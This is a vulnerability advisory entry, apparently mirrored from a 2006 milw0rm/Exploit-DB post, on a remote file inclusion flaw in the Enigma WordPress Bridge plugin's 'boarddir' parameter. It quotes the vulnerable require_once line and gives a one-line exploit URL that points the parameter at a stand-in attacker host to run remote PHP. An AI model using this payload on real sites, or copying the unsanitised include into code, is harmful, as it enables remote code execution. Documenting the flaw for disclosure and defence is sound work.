Enigma WordPress Bridge (boarddir) Remote File Include

vendor:

N/A

by:

xoron

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Enigma WordPress Bridge (boarddir) Remote File Include

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'boarddir' parameter to '/wp-content/plugins/Enigma2.php'. This can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code.

Mitigation:

Input validation should be used to prevent the inclusion of remote files.

Source

Exploit-DB raw data:

-----------------------------------------------

Enigma WordPress Bridge (boarddir) Remote File Include

-----------------------------------------------


Author: xoron

-----------------------------------------------
 
Vuln Code:

require_once($boarddir . '/PortalSources/Portal.ini.php');

-----------------------------------------------

3xplo!t:

WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://evil_scripts?

-----------------------------------------------

download:  http://www.lunabyte.org/downloads/WordPressBridge.zip

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
-                                                         -
-              Greetz: str0ke, Kacper                     -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-30]